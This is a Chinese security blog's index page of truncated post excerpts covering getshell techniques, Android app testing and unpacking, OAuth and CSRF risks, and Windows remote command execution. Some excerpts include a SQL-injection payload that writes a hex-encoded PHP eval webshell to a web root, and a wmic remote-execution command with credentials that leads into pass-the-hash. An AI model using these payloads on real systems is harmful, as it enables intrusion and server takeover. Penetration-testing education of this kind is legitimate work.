0x24bin's Blog

Author: sm0nk@深蓝攻防实验室 无论是常规渗透测试还是攻防对抗，亦或黑灰产对抗、APT攻击，getshell 是一个从内到外的里程碑成果。我们接下来总结下常见拿shell的一些思路和方法。文中可能有一些不足之处，还望大佬不吝赐教。 0x01 注入getshell 一般前提条件：有权限、知道路径 mysql select 0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into outfile '/var/www/html/1.php' Sql server...

@author : Dlive 在对Android应用进行Web漏洞测试时，经常遇到一种情况：HTTP传输的数据带有签名字段 处理这种情况的方法通常是逆向签名算法，但是如果算法在so中，而且so加壳了，想要逆向出算法也要花很大一番功夫 还有就是可以自己编写app调用so里的签名算法，然后对HTTP传输的数据进行测试 这两种方法都挺麻烦的，并且如果一个app中多处使用了不同的签名/加密算法就更麻烦了 曾经想写一个Android上的代...

作为第三方应用，为了提升用户体验，往往会提供第三方社交账号登录或者绑定的功能，这背后使用到的关键技术是OAuth认证。想要在自己的应用里集成OAuth不是难事儿，各大社交网站都提供了详尽的文档指南。 OAuth的复杂度比较高，有不少安全方面的坑，开发者在使用过程中一不注意可能就会掉进去，比如说不正确的使用OAuth2可能会遭遇到CSRF攻击。本文将对这个安全风险做一个通熟易懂的解释。 老司机发车前的...

set和list是Python常用的结构类型，这里不再多述。本文主要是总结了一些它们配合起来的一些妙用。 （1）去重 比如一个序列： >>>line = ['a','b','a'] 为了去除重复的'a'，可以进行如下操作： >>> list(set(line)) ['a', 'b'] （2）提取两个序列中出现过的非重复元素 比如两个序列： >>> line1=['a','b','a'] >>> line2=['a','c'] 为了得到这两个序列中出现的不同元素...

不过不觉已经更了几期了，不知道老哥们学会了多少，今天带来爱加密脱壳的教程，由于特殊原因，更不完全部的脱壳教程了，今天只能最后一期的更新了，当然也感谢很多老哥的关注！如果实在违规的话！我会删除所有的脱壳教程！ 废话不多说准备的软件如下: MT管理器+虚拟大师+反射大师 今天我们需要搞的安装包名为“某某输入法” 然后老规矩我们去虚拟大师里面导入并安装 然后打开反射大师，选择这个软件打开 ...

一、首先打开IDA 中dbgsrv文件夹，将里面的 android_server 传输到手机上 切换到IDA文件路径中D:\Program Files (x86)\IDA 6.8\dbgsrv adb push android_server /data/local/tmp 二、运行android_server C:\Users\cccv20>adb shell shell@shamu:/ $ su su root@shamu:/ # cd /data/local/tmp cd /data/local/tmp 1|root@shamu:/data/local/tmp # chmod 777 android_server chmod 755 android_s...

作者：曾哥 本文为作者投稿，Seebug Paper 期待你的分享，凡经采用即有礼品相送！ 投稿邮箱：[email protected] 一、PHP相关资料 PHP官方手册： https://www.php.net/manual/zh/ PHP函数参考： https://www.php.net/manual/zh/funcref.php 菜鸟教程： https://www.runoob.com/php/php-tutorial.html w3school： https://www.w3school.com.cn/php/index.asp 渊龙Sec安全团队导航： https://dh.aabyss.cn 开...

一、Web Service的含义及使用范围 Web Service覆盖的范围非常广泛，在桌面主机、Web、移动设备等领域都可以见到它的身影。任何软件都可以使用Web Service，通过HTTP协议对外提供服务。 在Web Service中，客户端通过网络向服务器发起请求，Web服务器按照适当的格式（比如JSON、XML等）返回应答数据，应答数据由客户端提供给最终的用户。 提及Web Service时，我们首先需要解释以下概念： SOAP（Simple Object...

看过程能让你更了解如何的安全编码，看文中红字结果让你知道防范措施。 什么是CSRF 跨站请求伪造 CSRF（Cross-site request forgery），中文名称：跨站请求伪造，也被称为：one click attack/session riding，缩写为：CSRF/XSRF。 那么CSRF到底能够干嘛呢？你可以这样简单的理解：攻击者可以盗用你的登陆信息，以你的身份模拟发送各种请求。攻击者只要借助少许的社会工程学的诡计，例如通过QQ等聊天软件发...

一、远程执行命令方式及对应端口:  IPC$+AT 445  PSEXEC 445  WMI 135  Winrm 5985(HTTP)&5986(HTTPS) 二、9种远程执行cmd命令的方法： 1.WMI执行命令方式,无回显： wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>d:\result.txt" 2.使用Hash直接登录Windows（HASH传递） 抓取windows hash值,得到administrator的hash： 598DDCE2660D...